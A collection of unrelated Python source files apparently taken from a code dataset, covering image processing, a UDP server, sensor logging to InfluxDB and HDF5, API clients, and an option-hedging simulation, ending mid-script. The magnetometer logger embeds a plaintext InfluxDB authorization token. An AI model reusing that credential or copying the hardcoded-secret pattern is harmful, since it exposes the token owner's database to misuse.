modules\nimport cv2\nimport sys\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom operator import itemgetter\nimport functools\n\n#from sklearn.externals import joblib\n#from skimage.feature import hog\n#import numpy as np\n\n# Load the classifier\n#clf = joblib.load(\"digits_cls.pkl\")\n\nim = []\n\ndef readCroppedImage():\n global im\n im = cv2.imread(\"identifycells/croppedImage.jpg\")\n#im = cv2.imread('2.jpg')\n#cv2.imshow(\"image\",im)\n\nrects = []\n\n# Read the input image \ndef preprocess():\n global im\n global rects\n \n # Convert to grayscale and apply Gaussian filtering\n im_gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n im_gray = cv2.GaussianBlur(im_gray, (5, 5), 0)\n \n # Threshold the image\n ret, im_th = cv2.threshold(im_gray, 90, 255, cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n #cv2.imshow(\"im_th:\",im_th)\n # Find contours in the image\n _,ctrs, hier = cv2.findContours(im_th.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n \n # Get rectangles contains each contour\n rects = [cv2.boundingRect(ctr) for ctr in ctrs]\n\n\"\"\"\ndef getKey(item):\n #print(\"verify x = \",item[0][0])\n return item[0][1]\n\ndef sortDigitImages(digitImages):\n sortedbyx = sorted(digitImages,key= getKey) \n print('sorted by x =',sortedbyx)\n for image in sortedbyx:\n print(\"coords = \",image[0])\n print(\"Image =\",image[1])\n plt.imshow(image[1])\n plt.show()\n key = cv2.waitKey(0)\n if key == 27:\n sys.exit(0)\n return sortedbyx\n\"\"\"\n\n# For each rectangular region, calculate HOG features and predict\n# the digit using Linear SVM.\ndef getDigitsImages():\n global im\n global rects\n #Digit images by coords\n digitImagesbyCoord = []\n #Images of each digit\n digitImages = []\n #coordinates of each rectangle\n coords = []\n count = 1\n #rects = sort_contours(ctrs)\n for rect in rects:\n \n x = rect[0]\n y = rect[1]\n w = rect[2]\n h = rect[3]\n # Draw the rectangles\n #print(\"rects = \",rects)\n cv2.rectangle(im, (rect[0], rect[1]), (rect[0] + rect[2], rect[1] + rect[3]), (0, 255, 0), 3) \n #print(\"rect[0] = \",rect[0])\n \n eachcoord = [(x,y),(x+w,y),(x+w,y+h),(x,y+h)]\n coords.append(eachcoord)\n #eachcoord = (rect[0] + rect[2], rect[1] + rect[3])\n # Coords also contains the bounding box for the entire image\n #coords.append(eachcoord)\n #print(\"eachcoord = \",eachcoord)\n # Mark th edge points in the image with a circle\n cv2.circle(im, (rect[0], rect[1]), 10, (255,0,0), -1)\n cv2.circle(im, (rect[0] + rect[2], rect[1] + rect[3]), 10, (255,0,0), -1)\n \n\n \n roi = im[y:y+h,x:x+w]\n \n filename = \"digitrecognize/digits/digits\"+str(count)+\".jpg\"\n cv2.imwrite(filename,roi)\n digitImages.append(roi)\n digitImagesbyCoord.append((rect,roi))\n count += 1\n #plt.imshow(roi)\n #plt.show()\n #cv2.imshow(\"roi\", roi)\n #plt.show()\n #key = cv2.waitKey(0)\n #if key == 27:\n # sys.exit(0)\n # Make the rectangular region around the digit\n #leng = int(rect[3] * 1.6)\n #pt1 = int(rect[1] + rect[3] // 2 - leng // 2)\n #pt2 = int(rect[0] + rect[2] // 2 - leng // 2)\n #roi = im_th[pt1:pt1+leng, pt2:pt2+leng]\n \n #print(\"Bounding rectangle dimensions:\")\n #print(\"pt1:\",pt1)\n #print(\"pt2:\",pt1+leng)\n #print(\"pt3:\",pt2)\n #print(\"pt4:\",pt2+leng)\n # Resize the image\n #roi = cv2.resize(roi, (28, 28), interpolation=cv2.INTER_AREA)\n #roi = cv2.dilate(roi, (3, 3))\n # Calculate the HOG features\n #roi_hog_fd = hog(roi, orientations=9, pixels_per_cell=(14, 14), cells_per_block=(1, 1), visualise=False)\n #nbr = clf.predict(np.array([roi_hog_fd], 'float64'))\n \n #cv2.putText(im, \"\", (rect[0], rect[1]),cv2.FONT_HERSHEY_DUPLEX, 2, (0, 255, 255), 3)\n \n #cv2.imshow(\"Resulting Image with Rectangular ROIs\", im)\n cv2.imwrite(\"digitrecognize/image.png\",im)\n #cv2.waitKey()\n return digitImagesbyCoord\n\n\t\ndef get_box_precedence(eachdigitImage, cols, imageName):\n tolerance_factor = 70\n if imageName == 'image1.jpg':\n tolerance_factor = 100\n elif imageName == 'image2.jpg':\n tolerance_factor = 70\n elif imageName == 'image3.jpg':\n tolerance_factor = 70\n\t\t\n #origin = cv2.boundingRect(contour)\n origin = eachdigitImage[0]\n print('origin[0] = ',origin[0])\n print('origin[1] = ',origin[1])\n print('get_box_precedence = ',((origin[1] // tolerance_factor) * tolerance_factor)*cols + origin[0])\n return ((origin[1] // tolerance_factor) * tolerance_factor)*cols + origin[0]\n #return origin[1] * cols + origin[0]\n\ndef sortDigitImagesTBLR(digitImages,imageName):\n #origin = digitImages[0]\n digitImages.sort(key=lambda x: get_box_precedence(x,im.shape[1],imageName))\n return digitImages\n\ndef removeSmallImages(digitImages):\n #print(\"len(digitImages = )\",len(digitImages))\n #print('parameter = ',digitImages)\n digitImagesBig = []\n #digitImageSize = len(digitImages)\n for i in range(0,len(digitImages)):\n image = digitImages[i]\n if image[1].shape[0] < 90:\n pass\n elif image[1].shape[1] < 90:\n pass\n else:\n digitImagesBig.append(image)\n return digitImagesBig\n\n\"\"\"\npreprocess()\ndigitImages = getDigitsImages()\n#digitImages = sortDigitImages(digitImages)\ndigitImages = sortDigitImagesTBLR(digitImages)\ndigitImages = removeSmallImages(digitImages)\n\n\nfor image in digitImages:\n print(\"coords = \",image[0])\n print(\"Image shape = \",image[1].shape)\n print(\"Image =\",image[1])\n plt.imshow(image[1])\n plt.show()\n key = cv2.waitKey(0)\n if key == 27:\n sys.exit(0)\n\"\"\"\n#digitImages = np.array(digitImages)\n\n#print('digitImages = ',digitImages)\n","sub_path":"code/identifycells/identifyDigits.py","file_name":"identifyDigits.py","file_ext":"py","file_size_in_byte":6044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"8309333","text":"\nclass Data(object):\n\n record_e = False\n keyword = None\n data = []\n total = 0\n name = []\n current_pos = 0\n end_pos = 0\n data_period = ['_1M.hist', '_5M.hist', '_15M.hist', '_30M.hist', '_1H.hist', '_4H.hist']\n\n def __init__(self, symbol, period, load_num=750, load_all=False):\n self.load_num = load_num\n self.load_all = load_all\n self.symbol = symbol\n self.period = period\n self._init_file(period, symbol)\n\n def _readall(self, filename):\n file_all = open(filename, 'rt')\n for line in file_all:\n line = line.split(',')\n line = [float(x) for x in line]\n self.data.append(line)\n file_all.close()\n self.next = self._nextall\n\n def next(self):\n pass\n\n def _nextall(self):\n self.current_pos += 1\n if self.current_pos < self.end_pos:\n return True\n else:\n self.current_pos -= 1\n return False\n\n def _nextnum(self):\n self.current_pos += 1\n if self.record_e:\n self.current_pos -= 1\n return False\n else:\n line = self.file_num.readline().split(',')\n if not line:\n self.file_num.close()\n self.record_e = True\n return False\n else:\n line = [float(x) for x in line]\n self.data.append(line)\n if len(self.data) > self.load_num:\n self.data.pop(0)\n return True\n\n def _readnum(self, filename):\n self.file_num = open(filename, 'rt')\n line = self.file_num.readline().split(',')\n line = [float(x) for x in line]\n self.data.append(line)\n self.next = self._nextnum\n\n def _init_file(self, period, symbol):\n path = '../../historical_data/'\n if period == 1:\n self.filename = path + symbol + self.data_period[0]\n elif period == 5:\n self.filename = path + symbol + self.data_period[1]\n elif period == 15:\n self.filename = path + symbol + self.data_period[2]\n elif period == 30:\n self.filename = path + symbol + self.data_period[3]\n elif period == 60:\n self.filename = path + symbol + self.data_period[4]\n elif period == 240:\n self.filename = path + symbol + self.data_period[5]\n self.total += 1\n if period == 240:\n self._readall(self.filename)\n self.end_pos = self.load_num\n else:\n self._readnum(self.filename)\n self.end_pos = self.load_num\n\n def get(self, shift=None, price_type=None):\n if self.current_pos - shift >= 0 and self.next == self._nextall:\n return self.data[self.current_pos - shift][price_type]\n elif self.next == self._nextnum:\n return self.data[-1 - shift][price_type]\n else:\n return False\n\n\n\nclass Database(object):\n\n def __init__(self, symbol):\n self.current_pos = 0\n self.data_1M = Data(symbol, 1, 10000, False)\n self.data_5M = Data(symbol, 5, 2000, False)\n self.data_15M = Data(symbol, 15, 750, False)\n self.data_30M = Data(symbol, 30, 500, False)\n self.data_1H = Data(symbol, 60, 200, False)\n self.data_4H = Data(symbol, 240, 50, False)\n\n def next(self):\n if self.data_1M.next() and self.current_pos != -1:\n self.current_pos += 1\n if self.current_pos % 5 == 0 and self.current_pos != 5:\n self.data_5M.next()\n if self.current_pos % 15 == 0 and self.current_pos != 15:\n self.data_15M.next()\n if self.current_pos % 30 == 0 and self.current_pos != 30:\n self.data_30M.next()\n if self.current_pos % 60 == 0 and self.current_pos != 60:\n self.data_1H.next()\n if self.current_pos % 240 == 0 and self.current_pos != 240:\n self.data_4H.next()\n return True\n elif not self.data_1M.next() and self.current_pos != -1:\n self.data_1M.next()\n self.data_5M.next()\n self.data_15M.next()\n self.data_30M.next()\n self.data_1H.next()\n self.data_4H.next()\n self.current_pos = -1\n return True\n elif self.current_pos == -1:\n return False\n\n def get(self, period, shift, price_type):\n if period == 1:\n return self.data_1M.get(shift, price_type)\n elif period == 5:\n return self.data_5M.get(shift, price_type)\n elif period == 15:\n return self.data_15M.get(shift, price_type)\n elif period == 30:\n return self.data_30M.get(shift, price_type)\n elif period == 60:\n return self.data_1H.get(shift, price_type)\n elif period == 240:\n return self.data_4H.get(shift, price_type)\n\n\n\nif __name__=='__main__':\n import datetime\n starttime = datetime.datetime.now()\n d=Database('EURUSD')\n while d.next():\n print(d.get(1,0,3))\n endtime = datetime.datetime.now()\n interval = (endtime - starttime).seconds\n print(interval)\n\n\n","sub_path":"quantlib/core/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"529574998","text":"import socket\n\nip_address = '127.0.0.1'\nport_number = 3333\n\nserver_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nserver_sock.bind((ip_address, port_number))\nprint(\"Server socket open...\")\nprint(\"------------------------------------------------------\")\nprint(\"Listening...\")\nwhile True:\n\tdata,addr = server_sock.recvfrom(5000)\n\trecvType = data.decode()[0:1]\n\trecvData = data.decode()[1:]\n\tprint(\"Type of Message : \" + data.decode()[0:1])\n\tprint(\"Received Message from client : \" + recvData)\n\tif recvType == \"0\":\n\t\tdata = recvData.upper()\n\telif recvType == \"1\":\n\t\tdata = recvData.lower()\n\telif recvType == \"2\":\n\t\tdata = recvData.swapcase()\n\telif recvType == \"3\":\n\t\tdata = recvData[::-1]\n\tprint(\"Converted Message : \" + str(data))\n\n\tserver_sock.sendto(data.encode(), addr)\n\tprint(\"Send message to client back...\")\n\tprint(\"------------------------------------------------------\")\n\tprint(\"Listening...\")\n\n\n\n","sub_path":"UDP/simple_UDP/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"391788576","text":"\"\"\"\nCode for pre-set pipelines of processing operations for numpy arrays of tif stacks\n\nRequires PIL and numpy as external packages\n\nRequires these other packages from ptmc:\nio\nprocessing\n\"\"\"\n\n#Import other packages\nimport numpy as np\nimport os\nfrom PIL import Image\nimport gc\n#PTMC itself\nimport io\nimport processing as pro\n\n\ndef makeReferenceFrame(refTif, saveDir=None, method='Median_Homomorphic'):\n '''\n Code to make a reference frame and save the output as a Tif.\n refTif is the full path to a Tif Stack to create a Reference Frame from\n refArray is a homomorphic filtered, mean intensity image that is motion corrected from refTif\n method is the method to use to make the reference frame, with the default being a Median Filter followed by a Homomorphic Filtering of the images, prior to motion correction\n A hidden output is a tif of the same name with '_MCrefImage\" appended to the end, which is a saved version of refArray\n '''\n #Insert functions for different registration methods\n def Median_Homomorphic(refTif, saveDir):\n #Parse path info in reference Tif\n fileparts = os.path.split(refTif)\n if saveDir is None: #If no save directory provided\n saveDir = fileparts[0]\n \n #Loading\n print('Loading Reference file ' + refTif)\n imgstack, fileparts = io.loadImageStack(inputTif=refTif)\n \n #Processing Steps\n print('Processing Reference file ' + refTif)\n medstack = pro.doMedianFilter(imgstack, med_fsize=3)\n homomorphstack = pro.doHomomorphicFilter(medstack, sigmaVal=7)\n del medstack #Remove to save memory\n gc.collect()\n homoshift, yshift, xshift = pro.registerImages(homomorphstack)\n rawshift = pro.applyFrameShifts(imgstack, yshift, xshift)\n #Save Reference Frame\n print('Saving Reference file ' + refTif)\n refArray = homoshift.mean(axis=0).astype(np.uint16)\n refIm = Image.fromarray(refArray)\n refIm.save(saveDir+'/'+fileparts[1][:-4]+'_MCrefImage.tif')\n rawRefArray = rawshift.mean(axis=0).astype(np.uint16)\n rawIm = Image.fromarray(rawRefArray)\n rawIm.save(saveDir+'/'+fileparts[1][:-4]+'_MCrefImageRaw.tif')\n print('Completed Reference file ' + refTif + '\\n')\n \n return refArray, rawRefArray\n \n #Dictionary for method selection and return\n method_select = {\n 'Median_Homomorphic': Median_Homomorphic(refTif, saveDir),\n }\n\n #Run the selected method from the dictionary the method_select dictionary\n return method_select.get(method, \"ERROR: No function defined for Provided Method\")\n\ndef correctImageStack(Tif, refIm, saveDir=None, method='Median_Homomorphic'):\n '''\n Perform motion correction and save output for a tif with a provided reference frame\n Tif is the full name and path to a single multipage tif\n refIm is the reference image to correct to\n saveDir is the directory to save the corrected images and outputs in\n method is the method to use to correct the image stack, with the default being a Median Filter followed by a Homomorphic Filtering of the images.\n Hidden outputs are the x & y shifts for each frame, motion corrected homomorphic filtered image stack, and motion corrected raw image stack, all saved within saveDir\n '''\n #Insert functions for different registration methods\n def Median_Homomorphic(Tif, refIm, saveDir):\n '''\n Perform motion correction and save output for a tif with a provided reference frame\n Tif is the full name and path to a single multipage tif\n refIm is the reference image to correct to\n saveDir is the directory to save the corrected images and outputs in\n '''\n #Parse path info in reference Tif\n fileparts = os.path.split(Tif)\n if saveDir is None: #If no save directory provided\n saveDir = fileparts[0]\n \n #Loading\n print('Loading file ' + Tif)\n imgstack, fileparts = io.loadImageStack(inputTif=Tif) \n #Processing Steps\n print('Processing file ' + Tif)\n medstack = pro.doMedianFilter(imgstack, med_fsize=3)\n homomorphstack = pro.doHomomorphicFilter(medstack, sigmaVal=7)\n homoshift, yshift, xshift = pro.registerImages(homomorphstack, Ref=refIm)\n rawshift = pro.applyFrameShifts(imgstack, yshift, xshift)\n #Save Output\n print('Saving file ' + Tif)\n io.saveFrameShifts(yshift, xshift, \n saveDir+'/'+fileparts[1], \n saveDir+'/'+fileparts[1][:-4]+'_frameShifts.hdf5')\n io.saveImageStack(homoshift, saveDir+'/m_f_'+fileparts[1])\n io.saveImageStack(rawshift, saveDir+'/m_'+fileparts[1])\n print('Completed file ' + Tif + '\\n')\n \n #Dictionary for method selection and return\n method_select = {\n 'Median_Homomorphic': Median_Homomorphic(Tif, refIm, saveDir),\n }\n\n #Run the selected method from the dictionary the method_select dictionary\n return method_select.get(method, \"ERROR: No function defined for Provided Method\")\n\n","sub_path":"ptmc/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":5110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"399200502","text":"import csv, requests, unicodedata, hashlib, os\n\n# CSV2DICT\ndef csv2dict (csv_url, csv_delimiter):\n ''' csv2dict\n Get CSV from URL and convert to Python dict().\n \n Params:\n - csv_url: URL from remote\n - csv_delimiter: Delimiter (example: '~' or '.')\n '''\n # Set CSV URL\n CSV_URL = csv_url\n\n with requests.Session() as session:\n # Outout CONTENT_LIST\n CONTENT_LIST = []\n \n # Get hash from content\n hash_object = hashlib.sha512(str(CSV_URL).encode('utf-8'))\n hex_dig = hash_object.hexdigest()\n \n # Create cache dir if not exist\n cache_path = '__pycache__/csv2dict/'\n if not os.path.exists(cache_path):\n os.makedirs(cache_path)\n \n # Check cached file and load if exists\n cache_file = cache_path + str(hex_dig)\n if(os.path.exists(cache_file)):\n encoded_content = open(cache_file, 'r', encoding='utf-8').read()\n\n # Get CSV from remote if cache doesn't exist\n else:\n request = session.get(CSV_URL)\n encoded_content = request.content.decode(request.encoding)\n open(cache_file, 'w', encoding='utf-8').write(encoded_content)\n \n # Create list of all elements\n cr = csv.reader(encoded_content.splitlines(), delimiter=csv_delimiter)\n lines = list(cr)\n\n # CSV header (colunm names)\n colunm_names = lines.pop(0)\n\n # Fix encode\n for l_i, line in enumerate(lines):\n for c_i, colunm in enumerate(line):\n lines[l_i][c_i] = unicodedata.normalize('NFKD', colunm).encode('ASCII','ignore').decode('ASCII')\n\n # Create CONTENT_LIST\n for l_i, line in enumerate(lines):\n tmpItem = {}\n for c_i, colunm in enumerate(line):\n tmpItem[colunm_names[c_i]] = lines[l_i][c_i]\n CONTENT_LIST.append(tmpItem)\n \n return CONTENT_LIST\n ","sub_path":"examples/app-aviacao-civil-brasil/libraries/csv2dict.py","file_name":"csv2dict.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"464382990","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import fft\nimport skimage.graph.mcp as mcp\nfrom skimage import data, img_as_float\n\nfrom skimage._shared.testing import assert_array_equal\n\nsrc = img_as_float(data.camera()[128:256, 128:256])\nsrc = src + 0.05 * np.random.standard_normal(src.shape)\ntarget = np.roll(src, (15, -10), axis=(0, 1))\ntarget = target + 0.05 * np.random.standard_normal(target.shape)\nsrc_freq = fft.fftn(src)\ntarget_freq = fft.fftn(target)\n\n# current implementation\nimage_product1 = src_freq * target_freq.conj()\ncross_correlation1 = fft.ifftn(image_product1)\n\n# fixed implementation\nimage_product = image_product1 / np.abs(image_product1)\ncross_correlation = fft.ifftn(image_product)\n\nfig, axes = plt.subplots(1, 2)\naxes[0].imshow(np.abs(cross_correlation1), cmap=plt.cm.gray)\naxes[0].set_title('Existing Implementation')\naxes[1].imshow(np.abs(cross_correlation), cmap=plt.cm.gray)\naxes[1].set_title('Proposed Implementation')\nfor ax in axes:\n ax.set_axis_off()\nplt.tight_layout()\nplt.show()\n\n \n","sub_path":"skimage/graph/tests/test_flexible.py","file_name":"test_flexible.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"165539142","text":"\"\"\"\nReads data from Honeywell HMR2300 Magnetometer, sends into InfluxDB/Grafana for live plotting, and writes to HDF5.\n\nSummer 2021\nTested On:\nStarfire (ubuntu 18.04)\nInflux 2.0.4\nGrafana 7.4.2\n\"\"\"\n\nimport serial\nimport numpy as np\n\n#ParseSerial and cython_read can be used interchangeably for parsing. cython_read was written for speed improvements, but runs similarly. If using cython, use array splitline_mag = [0,4,8,12]. Otherwise splitline_mag = [4,8,12]\n\nfrom ParseSerial import ReadSentence_Mag\n#from cython_read import ReadSentence_Mag\n\nimport requests #For posting to influx\nimport time\nimport sys\nimport h5py\nimport os\nimport glob\n\n\n\"\"\"---Authorization/QUERY initialization---\"\"\"\n#Starting with Influx 2.0, authorization tokens are necessary to access databases.\n#The token can be found under the \"Data\" tab in the Influx UI\n\n#Stringing together query access\nINFLUX_TOKEN='AjsrNgY_k97FMvgfCsgc2tPTx-lOVM-aYaCMjymNVIWpoSCkYh7H4AqIV9pLQHHk07zJa5pxTn4lo-3Ashwu5Q=='\nORG=\"tim@upenn\"\nINFLUX_CLOUD_URL='localhost'\nBUCKET_NAME='sensors'\n\n#Can change precision if needed. Currently set to nanoseconds (ns).\nQUERY_URI='http://{}:8086/api/v2/write?org={}&bucket={}&precision=ns'.format(INFLUX_CLOUD_URL,ORG,BUCKET_NAME)\n\nheaders = {}\nheaders['Authorization'] = 'Token {}'.format(INFLUX_TOKEN)\n\n#Parameters for line protocol that will be sent to Influx\nlocation_tag = 'lab'\nmeasurement_name = 'mag_data'\n\n\n\"\"\"---Serial port initialization---\"\"\"\n#Connecting to serial port. \nport ='/dev/ttyUSB5' \nbaudrate=9600\nmag = serial.Serial(port=port, baudrate=baudrate)\n\n\n\"\"\"---Parsing initilization---\"\"\"\n#Parsing parameters used in ReadSentence_Mag parse function\nheader_mag = \"0d\"\nsplitline_mag = [4,8,12]\nsentence_length_mag = 14\n\n\n\"\"\"---HDF5 logging initilization---\"\"\"\n#Number of data samples in each save file. Divide by 100 for seconds. (Magnetometer currently set to 10hz)\nN = 24000\ndataCount = 0 #Index counter\n\n#Timestamps used for filenames.\ntimestr = time.strftime(\"%Y%m%d-%H%M%S\")\ndatestamp = time.strftime(\"%Y-%m-%d-Mag\")\n\n#First check if there is a folder with current date. If there isn't, create one.\nif os.path.isdir(\"/home/user/tim-daq/data/\"+datestamp) == 0:\n os.mkdir(\"/home/user/tim-daq/data/\"+datestamp)\n\n#Then check if the folder is empty. If it's empty, the first file number will start at 1.\n#If the folder is not empty, check the file number of the last edited file, and add 1 to it for the new file. \nif len(os.listdir(\"/home/user/tim-daq/data/\"+datestamp)) == 0:\n file_number = 1\n file_number_string = str(file_number)\n \nelse:\n file_list = glob.glob(\"/home/user/tim-daq/data/\"+datestamp+\"/*.hdf5\")\n latest_file = max(file_list, key=os.path.getctime)\n file_number = int(latest_file[-10:-5]) + 1\n file_number_string = str(file_number)\n \n\n#Create the HDF5 file and datasets\nmagfile = h5py.File(\"/home/user/tim-daq/data/\"+datestamp+\"/Mag_\"+timestr+'_'+file_number_string.zfill(5)+\".hdf5\", \"w\", libver = 'latest')\n\nx_dset = magfile.create_dataset(\"x\", (N,), dtype='float', chunks = True, maxshape = (None,))\ny_dset = magfile.create_dataset(\"y\", (N,), dtype='float', chunks = True, maxshape = (None,))\nz_dset = magfile.create_dataset(\"z\", (N,), dtype='float', chunks = True, maxshape = (None,))\ntime_dset = magfile.create_dataset(\"time\", (N,), dtype='int64', chunks = True, maxshape = (None,))\n\n#The index dataset keeps track of the index value of the latest data point recorded.\n#This is helpful when we access the HDF5 file from another read program. The read program will know exactly which index to start reading from. \n#We can't use a \"last_value()\" function because the datasets are created with N empty spaces. \nindex_dset = magfile.create_dataset(\"index\", (1,), dtype='int64', chunks = True, maxshape = (None,))\n\n#The filenames dataset stores the file name of the current and next file.\nfilenames_dset = magfile.create_dataset(\"filenames\", (2,), dtype='int64', chunks = True, maxshape = (None,))\n\nfilenames_dset[0] = file_number\nfilenames_dset[1] = file_number + 1\n\n#Must set swmr (single writer multiple reader) to true in order to read and write concurrently.\nmagfile.swmr_mode = True\n\n\n\"\"\"---Main Loop---\"\"\"\nwhile True:\n #Extracts data from parsing function\n x_buff, y_buff, z_buff = ReadSentence_Mag(mag, header_mag, splitline_mag, sentence_length_mag) \n \n #Generates timestamp for Influx protocol\n current_point_time = int(round(time.time() * 1000000000))\n \n #Line protocol setup\n current_line = '{measurement},location={location} mag_x={x},mag_y={y},mag_z={z} {timestamp}'.format(measurement=measurement_name,location=location_tag, x=x_buff,y=y_buff,z=z_buff, timestamp=current_point_time) \n #print(current_line)\n\n #Sends data into Influx\n r = requests.post(QUERY_URI, data=current_line, headers=headers)\n #print(r.status_code)\n \n\n #Generates new HDF5 file once datacount is reached. Identical file checking and creation to program startup. \n if dataCount >= N:\n magfile.close() #Important to close current file!\n current_timestr = time.strftime(\"%Y%m%d-%H%M%S\")\n datestamp = time.strftime(\"%Y-%m-%d-Mag\")\n \n if os.path.isdir(\"/home/user/tim-daq/data/\"+datestamp) == 0:\n os.mkdir(\"/home/user/tim-daq/data/\"+datestamp) \n if len(os.listdir(\"/home/user/tim-daq/data/\"+datestamp)) == 0: \n file_number_string = str(1)\n else:\n file_list = glob.glob(\"/home/user/tim-daq/data/\"+datestamp+\"/*.hdf5\")\n latest_file = max(file_list, key=os.path.getctime)\n file_number = int(latest_file[-10:-5]) + 1\n file_number_string = str(file_number)\n \n \n magfile = h5py.File(\"/home/user/tim-daq/data/\"+datestamp+\"/Mag_\"+current_timestr+'_'+file_number_string.zfill(5)+\".hdf5\", \"w\", libver = 'latest')\n x_dset = magfile.create_dataset(\"x\", (N,), dtype='float', chunks = True, maxshape = (None,))\n y_dset = magfile.create_dataset(\"y\", (N,), dtype='float', chunks = True, maxshape = (None,))\n z_dset = magfile.create_dataset(\"z\", (N,), dtype='float', chunks = True, maxshape = (None,))\n time_dset = magfile.create_dataset(\"time\", (N,), dtype='int64', chunks = True, maxshape = (None,))\n index_dset = magfile.create_dataset(\"index\", (1,), dtype='int64', chunks = True, maxshape = (None,))\n filenames_dset = magfile.create_dataset(\"filenames\", (2,), dtype='int64', chunks = True, maxshape = (None,))\n \n filenames_dset[0] = file_number\n filenames_dset[1] = file_number + 1\n \n magfile.swmr_mode = True\n dataCount = 0\n \n else:\n #If datacount isn't reached, continue adding latest data into the HDF5 datasets\n x_dset[dataCount] = x_buff\n y_dset[dataCount] = y_buff\n z_dset[dataCount] = z_buff\n time_dset[dataCount] = current_point_time\n index_dset[0] = dataCount\n \n #Flushing is required to update datasets for reader programs\n x_dset.flush()\n y_dset.flush()\n z_dset.flush()\n time_dset.flush()\n index_dset.flush()\n dataCount += 1\n\n\n\n\n\n\n","sub_path":"Mag_ReadSendWrite.py","file_name":"Mag_ReadSendWrite.py","file_ext":"py","file_size_in_byte":7135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"128414337","text":"dohod = float(input())\nuspeh = float(input())\nzaplata = float(input())\n\n\nif zaplata <= dohod or uspeh < 4.5:\n print(\"You cannot get a scholarship!\")\nif dohod <= zaplata and uspeh >= 4.5:\n print(\"You get a Social scholarship {0} BGN\".format(round((zaplata - (zaplata * 0.65)))))\nelif 6 >= uspeh > 5.50:\n print(\"You get a scholarship for excellent results {0} BGN\".format(round(uspeh*25, 2)))\n","sub_path":"Basics Sept 2019/Stipendii.py","file_name":"Stipendii.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"25703917","text":"# https://pokeapi.co/\n\nimport requests\n\n\ndef get_pokemon(url=\"https://pokeapi.co/api/v2/pokemon-form/\", offset=0):\n args = {\"offset\": offset} if offset else {}\n response = requests.get(url, params=args)\n\n if response.status_code == 200:\n payload = response.json()\n results = payload.get(\"results\", [])\n\n if results:\n for pokemon in results:\n name = pokemon[\"name\"]\n print(name)\n\n next = input(\"¿Continuar Listado? [y/n] \\n\").lower()\n if next == \"y\":\n get_pokemon(offset=offset + 20)\n\n\nget_pokemon()\n","sub_path":"consume_api/pokeapi.py","file_name":"pokeapi.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"501725642","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 25 08:50:53 2019\n\n@author: zhangcheng\n\"\"\"\n\nimport numpy as np\nfrom scipy.stats import norm\nimport matplotlib.pylab as plt\n\n\nS=100\nsigma=0.25\nr=0.05\nT=1/12\nK=100\nN1=21\nN2=84\n\ndef simulate_stock_process(paths,steps,S,r,sigma,):\n 'Simulate stock moving process in the context of\\\n Black Scholes'\n \n deltaT=T/steps\n t=np.linspace(0,T,num=steps+1)\n X=np.c_[np.zeros((paths,1)),np.random.randn(paths,steps)]\n w=np.cumsum(np.sqrt(deltaT)*X,axis=1)\n return S*np.exp((r-1/2*sigma**2)*t+sigma*w)\n\n\n\n\ndef hedged_call(S, K, r, sigma,steps):\n 'Dynamic hedging strategy, it returns fair value of \\\n call, Delta and bond value that are shorting'\n \n t=np.linspace(0,T,num=steps+1)\n d1 = (np.log(S/K)+(r+sigma**2/2)*(T-t)) / (sigma*np.sqrt(T-t))\n d2 = d1 - sigma*np.sqrt(T-t)\n return S*norm.cdf(d1)- K*np.exp(-r*(T-t))*norm.cdf(d2), norm.cdf(d1),K*np.exp(-r*(T-t))*norm.cdf(d2)\n\ndef hedging_error(N):\n np.random.seed(0)\n deltaT=T/N\n St=simulate_stock_process(50000,N,S,r,sigma)\n# return call,delta and bond ndarray with Shape (50000,N+1)\n pcall,delta,bond=hedged_call(St,K,r,sigma,N)\n# The portfolio rebalances untill time T\n delta=delta[:,:-1]\n pcall=pcall[:,:-1]\n# the bond will grow at rf for each t\n fbond=bond*np.exp(r*deltaT)\n# profit and loss if no rebalancing made\n pnl=delta*St[:,1:]-delta*St[:,:-1]-(fbond-bond)[:,:-1]\n# the costs from implementing the rebalance to ensure delta hedged \n cost=delta[:,1:]*St[:,1:-1]-delta[:,:-1]*St[:,1:-1]-(bond[:,1:]-fbond[:,:-1])[:,:-1]\n# cash balance after deduct costs from P&L\n cashbalance=pnl[:,:-1]-cost\n# the inital call premium should be included into cash balance\n# time 0, it will just grow at risk free rate untill T. \n cashbalance[:,0]=cashbalance[:,0]+pcall[0,0]\n# All cash postions are expected to grow at risk free rate\n interval=len(cashbalance[1,:])\n futurecash=[]\n for i in range(interval):\n futurecash.append(cashbalance[:,i]*np.exp(r*deltaT*(interval-1-i)))\n futurecash=np.array(futurecash).T\n# the P&L at time T\n finalpnl=np.sum(futurecash,axis=1)\n# the hedging error\n return finalpnl-np.maximum(St[:,-1]-K,0)\n\ner21=hedging_error(N1)\ner84=hedging_error(N2)\n\nplt.rcParams['figure.figsize']=[15,5] \nfig,ax=plt.subplots(1,2,sharey=True)\nplt.suptitle('Black Scholes dynamic hedging error')\nax[0].grid()\nax[1].grid()\nax[0].hist(er21,range=(-1.5,1.5),density=True,color='r')\nax[0].set_xlabel('Final profit/loss')\nax[0].set_ylabel('Probability 